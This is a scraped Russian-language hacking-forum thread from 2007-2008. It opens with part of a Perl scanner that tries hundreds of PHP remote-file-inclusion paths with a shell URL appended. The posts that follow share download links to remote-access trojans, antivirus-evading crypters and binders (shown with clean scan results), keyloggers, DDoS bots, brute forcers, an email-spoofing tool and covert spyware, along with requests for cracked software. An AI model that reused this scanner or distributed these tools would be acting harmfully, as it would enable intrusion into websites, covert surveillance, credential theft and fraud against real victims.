$vuln287="zboard/include/write.php?dir=";
$vuln288="admin/plog-admin-functions.php?configbasedir=";
$vuln289="content.php?content=";
$vuln290="q-news.php?id=";
$vuln291="_conf/core/common-tpl-vars.php?confdir=";
$vuln292="votebox.php?VoteBoxPath=";
$vuln293="al_initialize.php?alpath=";
$vuln294="include/db.php?GLOBALS[rootdp]=";
$vuln295="modules/news/archivednews.php?GLOBALS[language_home]=";
$vuln296="protection.php?siteurl=";
$vuln297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$vuln298="index2.php?includes_dir=";
$vuln299="classes.php?LOCAL_PATH=";
$vuln300="extensions/moblog/moblog_lib.php?basedir=";
$vuln301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$vuln302="phpWebLog/include/init.inc.php?G_PATH=";
$vuln303="admin/objects.inc.php4?Server=";
$vuln304="trg_news30/trgnews/install/article.php?dir=";
$vuln305="block.php?Include=";
$vuln306="arpuivo.php?data=";
$vuln307="setup/index.php?GALLERY_BASEDIR=";
$vuln308="include/help.php?base=";
$vuln309="index.php?[Home]=";
$vuln310="block.php?Include=";
$vuln311="examples/phonebook.php?page=";
$vuln312="PHPNews/auth.php?path=";
$vuln313="include/print_category.php?dir=";
$vuln314="skin/zero_vote/login.php?dir=";
$vuln315="skin/zero_vote/setup.php?dir=";
$vuln316="skin/zero_vote/ask_password.php?dir=";
$vuln317="gui/include/sql.php?include_path=";
$vuln318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
$vuln319="email.php?login=cer_skin=";
$vuln320="PhotoGal/ops/gals.php?news_file=";
$vuln321="index.php?custom=";
$vuln322="loginout.php?cutepath=";
$vuln323="oneadmin/config.php?path[docroot]=";
$vuln324="xcomic/initialize.php?xcomicRootPath=";
$vuln325="skin/zero_vote/setup.php?dir=";
$vuln326="skin/zero_vote/error.php? dir=";
$vuln327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$vuln328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$vuln329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$vuln330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$vuln331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$vuln332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$vuln333="src/index_overview.inc.php?config[path_src_include]=";
$vuln334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$vuln335="src/index_image.inc.php?config[path_src_include]=";
$vuln336="src/image-gd.class.php?config[path_src_include]=";
$vuln337="src/image.class.php?config[path_src_include]=";
$vuln338="src/album.class.php?config[path_src_include]=";
$vuln339="src/show_random.inc.php?config[path_src_include]=";
$vuln340="src/main.inc.php?config[path_src_include]=";
$vuln341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$vuln342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$vuln343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$vuln344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$vuln345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$vuln346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$vuln347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$vuln348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$vuln349="src/index_overview.inc.php?config[path_src_include]=";
$vuln350="src/image-gd.class.php?config[path_src_include]=";
$vuln351="src/image.class.php?config[image_module]=";
$vuln352="src/album.class.php?config[path_src_include]=";
$vuln353="src/show_random.inc.php?config[path_src_include]=";
$vuln353="src/main.inc.php?config[path_src_include]=";
$vuln354="includes/db_adodb.php?baseDir=";
$vuln355="includes/db_connect.php?baseDir=";
$vuln356="includes/session.php?baseDir=";
$vuln357="modules/projects/gantt.php?dPconfig[root_dir]=";
$vuln358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$vuln359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$vuln360="modules/admin/vw_usr_roles.php?baseDir=";
$vuln361="modules/public/calendar.php?baseDir=";
$vuln362="modules/public/date_format.php?baseDir=";
$vuln363="modules/tasks/gantt.php?baseDir=";
$vuln364="mantis/login_page.php?g_meta_include_file=";
$vuln365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$vuln366="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln367="dotproject/modules/files/index_table.php?root_dir=";
$vuln368="nukebrowser.php?filnavn=";
$vuln369="bug_sponsorship_list_view_inc.php?t_core_path=";
$vuln370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$vuln371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$vuln372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln373="includes/calendar.php?phpc_root_path=";
$vuln374="includes/setup.php?phpc_root_path=";
$vuln375="phpBB/admin/admin_styles.php?mode=";
$vuln376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$vuln377="admin/lang.php?CMS_ADMIN_PAGE=";
$vuln378="inc/pipe.php?HCL_path=";
$vuln379="include/write.php?dir=";
$vuln380="becommunity/community/index.php?pageurl=";
$vuln381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln383="modules/agendax/addevent.inc.php?agendax_path=";
$vuln384="shoutbox/expanded.php?conf=";
$vuln385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln386="index.php?page=";
$vuln387="index.php?pag=";
$vuln388="index.php?include=";
$vuln389="index.php?content=";
$vuln390="index.php?cont=";
$vuln391="index.php?c=";
$vuln392="modules/My_eGallery/index.php?basepath=";
$vuln393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$vuln394="journal.php?m=";
$vuln395="index.php?m=";
$vuln396="links.php?c=";
$vuln397="forums.php?m=";
$vuln398="list.php?c=";
$vuln399="user.php?xoops_redirect=";
$vuln400="index.php?id=";
$vuln401="r.php?url=";
$vuln402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$vuln403="inc/formmail.inc.php?script_root=";
$vuln404="include/init.inc.php?G_PATH=";
$vuln405="backend/addons/links/index.php?PATH=";
$vuln406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$vuln407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$vuln408="protection.php?siteurl=";
$vuln409="htmltonuke.php?filnavn=";
$vuln410="mail_autocheck.php?pm_path=";
$vuln411="index.php?p=";
$vuln412="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln413="e107/e107_handlers/secure_img_render.php?p=";
$vuln414="include/new-visitor.inc.php?lvc_include_dir=";
$vuln415="community/modules/agendax/addevent.inc.php?agendax_path=";
$vuln416="library/editor/editor.php?root=";
$vuln417="library/lib.php?root=";
$vuln418="zentrack/index.php?configFile=";
$vuln419="pivot/modules/module_db.php?pivot_path=";
$vuln420="myPHPCalendar/admin.php?cal_dir=";
$vuln421="index.php/main.php?x=";
$vuln422="os/pointer.php?url=";
$vuln423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$vuln424="db.php?path_local=";
$vuln425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$vuln426="index.php?kietu[url_hit]=";
$vuln427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$vuln428="Sources/Packages.php?sourcedir=";
$vuln429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$vuln430="cgi-bin//gadgets/Blog/BlogModel.php?path=";
$vuln431="Gallery/displayCategory.php?basepath=";
$vuln432="load_phplib.php?_PHPLIB[libdir]=";
$vuln433="main_prepend.php?_SERWEB[functionsdir]=";
$vuln434="load_lang.php?_SERWEB[configdir]=";
for ($i=1;$i<435;$i++)
{
$cont=vuln.$i;
chomp $cont;
print "$cont\n";
$final=$host.$$cont."$shell?";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /$string/){
open(FILE,">>results.txt");
print FILE "$final\n";
close(FILE);
print "-------------------------------------------------\n";
print "$final\n";
print "IS VULNZ..\n";
print "-------------------------------------------------\n";
}}
}
xHacker Crypterhttp://rapidshare.com/files/77124872/xhacker_crypter.rar
IRC IP grabberhttp://rapidshare.com/files/77691770/irc_ip_grabber.exe.html
Fierce Domain Scanhttp://ha.ckers.org/fierce/
HAC Downloaderhttp://www.fileshare.ro/462098240.18
LORD Password Sender 2.0http://w15.easy-share.com/12138421.html
VNC Mini-Backdoorhttp://rapidshare.com/files/51381520/VNC_Mini-Backdoor.rar
Bifrost 1.2b Private BuildКод
Antivirus Version Last Update Result
AhnLab-V3 2007.11.10.0 2007.11.09 -
AntiVir 7.6.0.34 2007.11.09 -
Authentium 4.93.8 2007.11.10 -
Avast 4.7.1074.0 2007.11.10 -
AVG 7.5.0.503 2007.11.10 -
BitDefender 7.2 2007.11.10 DeepScan:Generic.Malware.SE!dldg.24CDB148
CAT-QuickHeal 9.00 2007.11.10 -
ClamAV 0.91.2 2007.11.11 -
DrWeb 4.44.0.09170 2007.11.10 -
eSafe 7.0.15.0 2007.11.08 Suspicious File
eTrust-Vet 31.2.5284 2007.11.09 -
Ewido 4.0 2007.11.10 -
FileAdvisor 1 2007.11.11 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.10 -
F-Secure 6.70.13030.0 2007.11.10 -
Ikarus T3.1.1.12 2007.11.10 -
Kaspersky 7.0.0.125 2007.11.11 Heur.Invader
McAfee 5160 2007.11.09 -
Microsoft 1.3007 2007.11.11 -
NOD32v2 2651 2007.11.10 -
Norman 5.80.02 2007.11.09 -
Panda 9.0.0.4 2007.11.10 -
Prevx1 V2 2007.11.11 -
Rising 20.17.52.00 2007.11.10 -
Sophos 4.23.0 2007.11.11 -
Sunbelt 2.2.907.0 2007.11.09 -
Symantec 10 2007.11.10 -
TheHacker 6.2.9.123 2007.11.10 -
VBA32 3.12.2.4 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.10 -
Webwasher-Gateway 6.0.1 2007.11.10 Win32.Malware.gen!88 (suspicious)
http://rapidshare.com/files/69389028/Bifrost_1.2b_Private_Build.rar
DiGi-Binder [PRIVATE]http://rapidshare.com/files/75114043/digibinder.rar
Biohazard RAT 0.0.1.1 Alphahttp://www.fileshare.ro/455624465.805
DownTroj v0.1Код
DownTroj is a trojan horse with following features:
- remote messagebox
- remote info
- remote file browser (+ download, upload, delete, make/del dir)
- remote shell
- remote task manager (+ start/kill)
- remote keylogger
- remotely reboot or shutdown system
Coded in C/C++ and also has:
- reverse connection (bypasses routers)
- more victims at the same time
- unlimited number of hosts/ports to connect to
- installing into location where its impossible to access with windows explorer
- UD startup method via registry (but not CurrentVersion\Run :p)
- task manager process hidder
- windows firewall bypass
http://"%20
downloadd4rK_z0n3 keylogg3Rhttp://www.fileshare.ro/458103153.605
CODE
Trojan Horses
- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
- Subseven v2.2
- Girlfriend v1.35
- Back Attack 1.8
- Turkojan v3
Keyloggers
- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v2.0
- A++++
- Curiosity
- Keylogger
- KeyCopy
Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner
WebHacks/WordLists
Brute Forcers
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer - Unix
CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
PHP Shells
- Cyper Eye 5 (asp)
- Rootshell (php)
- r57Shell (php)
- backdoor (php)
- Indexer (asp)
- NT Daddy (asp)
- NST View (php)
- REM View (php)
- C99Shell (php)
- AjanShell (asp)
- CASUS (php)
RFI & RCE
- XML-RPC Scanner & Exploiter
- PHPAttacker
- phpinjection scan exploit 2006 v2
- iis5dav scan exploit 2006 v2
SQL InjecTion & XSS TooLz
- SQLRecon
- SQLVulnscan
- Casi v4.0
- ForceSQL
- SQLPing 2
- SQL-XSS Tool
- SQL Bruteforce
Apache Hacking TooLz
- Apache Chunked Scanner
- Apache Hacker Tool v 2.0
- Apache h4x0r
Viruses
- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ
Virus Builders
- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus
MSN Hacks & Bots
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger
Port & IP Scanners
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack
Nukers And Flooders
- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune v2.4
- Battle Pong - Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2
Exploits
- Internet Explorer CSS Exploit
- Jpeg of death
- WMF maker
- MS04011 lsasrv.dll rpc auto hacker v2
- Windows WMF Download and Exec Exploit
- WINRAR 3.41 corrupt zip file (Proof of Concept)
- MPACK
- ICE PACK
Packers & Encrypters
- Themida
- Morphine
PsTools is a Tool Pack from sysinternals (Microsoft)
EXTRA!
- Telnet Tutorial
- The Giant Black Book of Computer Viruses
- Great Tutorials Pack
http://24.161.50.41/Hacker%20Tools%20and%20Exploits/UltimateHacking2007.rar.pass-hacksector
Dollarwarez.com acct genhttp://www.st0r3.com/download.php?id=F138C0231
Автор: Creeping Death 4.01.2008, 12:15
Лошади
FEAR
http://rapidshare.com/files/79681740/FearRAT.rar
Remote Format
http://rapidshare.com/files/78099920/RemoteFormat.ZIP.html
http://www.speedyshare.com/424250846.html
http://www.2shared.com/file/2627377/5e5a1bf7/RemoteFormat.html
RubyRAT
http://rapidshare.com/files/78613630/RubyRAT_1.0.rar.html
http://www.speedyshare.com/139655371.html
CIA 1.3
http://www.speedyshare.com/395687916.html
Char0n
http://rapidshare.com/files/81050270/Char0n.rar.html
Poison ivy 2.30
http://rapidshare.com/files/67251269/poison_ivy_2.30.rar.html
HaCkEdSs RAT
CLIENTU
http://rapidshare.com/files/81068417/HaCkEdSs_CLIENT.rar
SERVERU
http://rapidshare.com/files/81068456/HaCkEdSs_Server.rar
Binder&Crypter
h4ck-y0u_Crypt[new]
http://rapidshare.com/files/76933550/h4ck-y0u.rar.html
Spider Binder 1.2
http://rapidshare.com/files/77600505/Spider_Binder_1.2.rar.html
Binders Pack
Код
AFX Executable Binder PRO
-Amok Joiner
-Asylum Binder
-Binder
-BlackCore File Binder
-Blade Stoner 1.5
-BTS Binder
-Crucified 1.2
-Djoiner 1.3
-Deception v4.0
-Droopy Binder 1.0
-EES Binder 1.0
-exe,jpg,doc File Binder
-Exebinder v2.5
-F.B.I
-File Injector v3
-Fresh Bind
-Freshbind v2.01
-Frusion v1.0
-HelioS Binder v1.0c
-Hook Toolbox
-IDE Spinner
-Inbinder v1.0
-Interlaced II v1.00
-J-BiNdEr
-M3Byter
-MBinder
-Multi Binder 1.4.1
-MVM v1.0
-NakedBind v1.0
-Newjoin
-NG Binder Pro
-Nightwolf Binder 1.0 Alpha
-OverDoz 2
-Pretator v1.6
-Reductor 1.0b (Beta 4)
-Rephlex Binder 0.2
-SCD 1.0
-Silk Rope v2.0 (Binaries and Source)
-ToP GUI Full 2.0
-Trendy Nigger 1.0b
-X-Exe Joiner
-YAB (Yet Another Binder)
http://rapidshare.com/files/38856990/Binders.rar
TheDefaced Predator v1.6 http://rapidshare.com/files/78139716/Deface_Predator.rar.html
http://www.speedyshare.com/955667959.html
PI 2.1.4http://rapidshare.com/files/78310321/PI_2.1.4_Private_.rar.html
Useless Binder http://rapidshare.com/files/80479258/Useless.exe
UnThemida v2 http://rapidshare.com/files/77976403/UnThemida_2.0.rar.html
Автор: Xeta123 13.01.2008, 19:21
Immunity Canvas v2
Иммунитет в CANVAS предоставляет сотни подвиги, эксплуатация автоматизированной системы, и всеобъемлющей, надежной эксплуатации рамки развития тестеров для проникновения и специалистов по вопросам безопасности во всем мире.
Цитата
hXXp://rapidshare.com/files/56812828/immunity_canvas-2.rar
Core Impact v4ОСНОВНЫЕ ПОСЛЕДСТВИЯ является наиболее полным продуктом для оценки вашей организации возможности для выявления, предотвращения и реагирования на угрозы информационной безопасности. К безопасно воспроизведение реального мира нападений сетевых серверов и рабочих станций, конечных пользователей систем, и веб-приложений, IMPACT позволяет найти и устранить проблемы безопасности, прежде чем данные инциденты происходят.
Цитата
hXXp://rapidshare.com/files/76874551/coreimpactv4.rar
Автор: nikhak 13.02.2008, 12:19
народ подскажите где взять NetScan Tools pro или manual по superscan
Автор: StuDY 18.02.2008, 01:22
Народ,подскажите софтину или скрипт может у кого есть,который собирает с сайта ссылки с переменными.
Автор: Creeping Death 25.02.2008, 23:14
FUD Crypter
Цитата
Antivirus Version Last Update Result
AhnLab-V3 2008.2.4.10 2008.02.04 -
AntiVir 7.6.0.62 2008.02.04 -
Authentium 4.93.8 2008.02.04 -
Avast 4.7.1098.0 2008.02.03 -
AVG 7.5.0.516 2008.02.04 -
BitDefender 7.2 2008.02.04 -
CAT-QuickHeal 9.00 2008.02.01 -
ClamAV 0.92 2008.02.04 -
DrWeb 4.44.0.09170 2008.02.04 -
eSafe 7.0.15.0 2008.01.28 -
eTrust-Vet 31.3.5509 2008.02.04 -
Ewido 4.0 2008.02.04 -
FileAdvisor 1 2008.02.04 -
Fortinet 3.14.0.0 2008.02.04 -
F-Prot 4.4.2.54 2008.02.03 -
F-Secure 6.70.13260.0 2008.02.04 -
Ikarus T3.1.1.20 2008.02.04 -
Kaspersky 7.0.0.125 2008.02.04 -
McAfee 5221 2008.02.01 -
Microsoft 1.3204 2008.02.04 -
NOD32v2 2846 2008.02.04 -
Norman 5.80.02 2008.02.01 -
Panda 9.0.0.4 2008.02.04 -
Prevx1 V2 2008.02.04 -
Rising 20.29.22.00 2008.01.30 -
Sophos 4.26.0 2008.02.04 -
Sunbelt 2.2.907.0 2008.02.02 -
Symantec 10 2008.02.04 -
TheHacker 6.2.9.208 2008.02.04 -
VBA32 3.12.6.0 2008.02.03 -
VirusBuster 4.3.26:9 2008.02.03 -
Webwasher-Gateway 6.6.2 2008.02.04 -
Additional information
File size: 307200 bytes
MD5: b39c433fbca0c4621c4c5e5fcf3bb5fa
SHA1: 537eb79d71fedcd66b8c46f24400e4eed4def565
PEiD: -
Password: tool-base
http://rapidshare.com/files/89733247/CC_-_CraniumCrypt.rar.html
Hell Binder [BUN]http://rapidshare.com/files/88653905/HELL_1_CRYPTER__UNdetected__.rar.html
Kit BindersЦитата
-antidote_v1.2_osce
-chinaprotect 0.3
-mucki_s_protector
-sexecrypter_with_udstub
-Super_Binder
-topo12
====
Pass:
filefusion
http://www.megaupload.com/?d=2OLHREVT
Автор: ter10n 21.03.2008, 16:33
Mail.ru Web Brut - 2.0 by F1reF0x

Хороший брут, пока быстрый.
http://rapidshare.com/files/101199733/bc7d68ff3Mailruwebbrut.rar.html
Автор: life_is_shit 27.03.2008, 21:57
ищу Web Icq Bot shell, выполняет функции шелла через протокол icq на win-системе.
заранее спасибо.
Автор: ter10n 9.04.2008, 21:33
Simple FTP check v0.1 by Psixo
Простой ФТП чеккер который пришлось написать для своих нужд. Необходимо было быстро и удобно прочекать около 10000 ФТП (фриихосты), а консольные решения, которые были, меня не устраивали, т.к. сортировка шла пачками по несколько сотен ФТП, то заносить их в отдельный файл,заново пускать чекк (пусть и многопоточный) - не удобно.

Просто засовываем список ФТП и жмём кнопку Check . Стартует процесс проверки проксей, при желании окно с выводом инфы о статусе чекка можно закрыть,проверка не остановится, она будет идти пока не закончаться все FTP. Надо лишь изредка заглядывать на страницу и смотреть каковы результаты.
Дополнительно справа размещены ссылки на файлы с результатами (Good FTP list и Bad FTP list). Ниже них находится ссылка для удаления одинаковых ФТП из файлов, т.е. дубляжей - Delete repetitions. И ссылка для очистки файлов с результатами Clean files.
Перед использование верно раставьте права на файлы в которые будут помещаться результаты!
Права:
chmod 777 ftp_bad.txt;
chmod 777 ftp_good.txt; © Psixo
ftp_cheker_v0_1.zip ( 2,99 килобайт )
: 27
Автор: life_is_shit 16.04.2008, 04:08
Цитата(life_is_shit @ 27.03.2008, 21:57)

ищу Web Icq Bot shell, выполняет функции шелла через протокол icq на win-системе.
заранее спасибо.
найдено, кому надо смотрим здесь h__p://cdaem.ru/Win_Bot.exe (з.ы. не проверено)
Автор: KABALLL 17.05.2008, 02:38
Цитата(неузнаваемый @ 25.05.2007, 03:31)

Illusion Ddos bot 1.1
В архиве: хелп, ридми, крякнутый билдер, некрякнутый билдер (во вложеном архиве), пустой сервер бота.

<!--private_data=0-->
http://damagelab.org
Статья по настройке http://team-madalf.com/index.php?showtopic=42612&view=getnewpost
пасс <!--private_data=1-->
Здарова!!!Ты незнаеш какой код у Ddosbota?
Люди подскажите пароль к Ddos.bot?
Автор: Natali V 2.06.2008, 17:35
Цитата(@llexxxei @ 11.04.2007, 14:58)

Вскрываем *.rar
<!--private_data=0-->
как вскрыть запароленный rar
помогите пожалуйста
Автор: MadDog 2.06.2008, 18:02
Цитата(Natali V @ 2.06.2008, 18:35)

как вскрыть запароленный rar
помогите пожалуйста
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Hroft_clone3 3.06.2008, 17:11
Народ, нужен последний Advanced Office Password Recovery от Elcomsofta, весь форум перерыл, живых линков не нашел :(
Автор: MASKA 24.06.2008, 15:08
QUOTE(Natali V @ 2.06.2008, 19:35)

как вскрыть запароленный rar
помогите пожалуйста
если длина пароля около 8 то шансов найти пароль очень мало...
QUOTE(Hroft_clone3 @ 3.06.2008, 19:11)

Народ, нужен последний Advanced Office Password Recovery от Elcomsofta, весь форум перерыл, живых линков не нашел :(
Вот ссылки, раньше работали пробуй
http://www.ftp2share.com/file/0e355040-4d66-4130-8681-45a1befac6c3/Advanced.Office.Password.Recovery.Professional.v4.0-YAG.rar.html
http://rapidshare.com/files/66058392/aoprp4-yag.zip.html
Автор: Hroft_clone3 25.06.2008, 13:14
Цитата(MASKA @ 24.06.2008, 16:08)

если длина пароля около 8 то шансов найти пароль очень мало...
Вот ссылки, раньше работали пробуй
http://www.ftp2share.com/file/0e355040-4d66-4130-8681-45a1befac6c3/Advanced.Office.Password.Recovery.Professional.v4.0-YAG.rar.html
http://rapidshare.com/files/66058392/aoprp4-yag.zip.html
Спасибо, но, увы, везде поудаляли :(
Автор: MadDog 25.06.2008, 14:48
Цитата(Hroft_clone3 @ 25.06.2008, 14:14)

Спасибо, но, увы, везде поудаляли :(
Не везде!!
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Hroft_clone3 25.06.2008, 16:23
Спасибо, наконец то
Автор: lavis 8.07.2008, 19:07
Народ! Помогите! Нужен програмный РИП, точнее Epson 7600 RIP под винду, с лекарством
Автор: Cmucl 31.07.2008, 20:19
Нужен взломаный Xspider 7.7.Выложите у кого есть.
Автор: MYSTiQUE 18.08.2008, 16:11
Могу предложить XSpider v7.5 Full Build.1712 RUS
Автор: MYSTiQUE 12.09.2008, 13:28
Shell Bots Collection - PHP-CGI-ASP-Perl-Python-IRC-MySQL
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: MadDog 13.09.2008, 13:00
Цитата(Cmucl @ 31.07.2008, 21:19)

Нужен взломаный Xspider 7.7.Выложите у кого есть.
Поиск юзать не судьба????
http://team-madalf.com/index.php?showtopic=40726&hl=Xspider
Автор: draiver13 2.10.2008, 20:21
программка для декодирования телефонов по imei
если телефон заблокирован просто нажимаем в телефоне *#06# и переписываем из дисплея телефона в программу и генерируется код для разблокировки
http://depositfiles.com/files/8407047
Автор: Rim 11.10.2008, 12:25
DosHTTP 2.0
Интерфейс: Английский
Размер: 296 Кб
ОС: Windows
» Описание «
Легкая и довольно мощная утилита для организации DoS атак или флуда. Полная зарегистрированная версия. Все сводится лишь к вводу адреса и нажатия кнопки "начать флуд". Перед началом использования ознакомьтесь с файлов инструкция.txt
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: MYSTiQUE 14.10.2008, 14:23
Охренительный фейк rapidshare.de 
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: Rim 14.10.2008, 16:41
Crazy Mail 6
Интерфейс: Русский
Размер: 1.3 Мб
Лекарство: не требуется
ОС: Windows 95/98/ME/NT/2000/XP/2003/Vista

» Описание «
Программа Crazy Mail предназначена для бесплатной отправки текстовых и HTML сообщений с подменой E-Mail адреса и отчётом о доставке.
Например, вам нужно отправить письмо определённому адресату, и необходимо чтобы он думал, что это письмо ему пришло не от вас а от компании к примеру Microsoft, в этом случае вам необходимо в поле "От кого" ввести адрес компании Microsoft.
Что нового:
1. Реализован редактор сообщений.
2. Добавлена новая функция "Отчёт о доставке".
3. Создан и внедрён новый движок отправки для более облегчённой отправки для ЦП.
4. Исправлено множество незначительных и не видимых ошибок которые были в предыдущих версиях.
5. Добавлено новые скины.
6. Добавлены новые расширённые функции по программе.
7. По просьбе пользователей реализована записная книжка.
8. Добавлена возможность отправлять письма в HTML формате.
9. Полностью был переписан двигатель программы, что гораздо снизило нагрузку при отправке сообщения на процессор ПК. А так же скорость передачи сообщения.
10. Написана функция по настройке формы, это выбор "Градиента", "Контрастности". А так же сменные скины.
11. Исправлены некоторые ошибки прежних версий...
12. Исправлена ошибка существующяя в предыдущих версиях с кодировкой. Теперь "имя" отображается корректно.
13. Откорректирована фильтрация сообщений, что позволяет отправлять сообщение в соответствии с единым стандартом.
14. Исправлено "мигание окна", тоесть окошко формы перестаёт мигать чёрным и терятся...
15. Внесены коррективы в систему отправки HTML сообщений. Улучшена производительность программы...
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: HACKALL 17.10.2008, 23:11
Цитата(draiver13 @ 2.10.2008, 21:21)

программка для декодирования телефонов по imei
если телефон заблокирован просто нажимаем в телефоне *#06# и переписываем из дисплея телефона в программу и генерируется код для разблокировки
http://depositfiles.com/files/8407047
Чет эта прога не запускается вообще..
Автор: DiZz3l 19.10.2008, 20:31

Cборник содержит самые необходимые программы и утилиты для хакера. Все представлено в удобной оболочке с фоновой музыкой.
Содержит следующий софт:
- Cain and Abel (сниффер)
- John the Ripper (мощный брутфорсер)
- NetStumbler (позволяет определить радиус действия сети WiFi
- в реальном времени на диаграмме можно увидеть величину полезного сигнала)
- Nmap (навороченый сетевой сканер)
- Putty (неплохой телнет клиент)
- SuperScan (мощный сканер TCP портов, pinger и hostname resolver)
- Hping (позволяет генерировать специальные ICMP/UDP/TCP пакеты и просматривать ответы пингуемого хоста в стиле обычной утилиты ping)
- Lcp (аудит и восстановление паролей Windows NT / 2000 / XP / 2003)
- Nikto (perl сканер уязвимостей Web сервера, с поддержкой SSL)
- Kismet (сниффер беспроводной сети 802.11 и дешифратор пакетов)
Размер: 56.53 МБ
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: DiZz3l 19.10.2008, 20:51

Easy Rapidshare Points 3.0
Эта программа пригодится для охотников за поинтами на rapidshare. Не секрет , что многие зарабатывают тем , что закачивают файлы на rapidshare и получают бонусы от скачек своих файлов. Это объясняет присылаемые новости на многие сайты. Чем больше скачек, тем больше поинтов у аплоадера. Easy Rapidshare Points будет сама скачивать ваши файлы как дармовой пользователь! Эдакий бот для rapidshare Программа качает - вы получаете поинты.
1 минута: 1 point
30 минут: 30 points
1 час: 60 points
1 день: 1,440 points
Месяц: 43,200 points
Скачать:
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Rim 22.10.2008, 13:54
KGB Employee Monitor 4.2.2
Интерфейс: Английский
Размер: 6.4Мб

» Описание «
Функциональные возможности программы позволяют Вам установить невидимый режим работы KGB Spy, так что никто и не догадается, что за ним следит самый настоящий "клавиатурный шпион". KGB Spy незаметно следит за работой компьютера: записывает вводимую с клавиатуры информацию, данные из буфера обмена, проводит мониторинг посещенных сайтов.
Собранная в ходе мониторинга информация сохраняется в базу данных, к которой только вы имеете доступ. Вы можете получить на свой электронный ящик письмо с подробной информацией о том, кто, когда и что делал на компьютере. Вам просто нужно будет время от времени заглядывать в свою почту.
Главные особенности Шпиона КГБ:
Видимый / невидимый режим
Перехват нажатых клавиш на клавиатуре
Мониторинг буфера обмена
Запись снимков экрана (скриншотов)
Мониторинг посещенных веб-сайтов
Уведомления на электронный ящик о наборе определенных слов
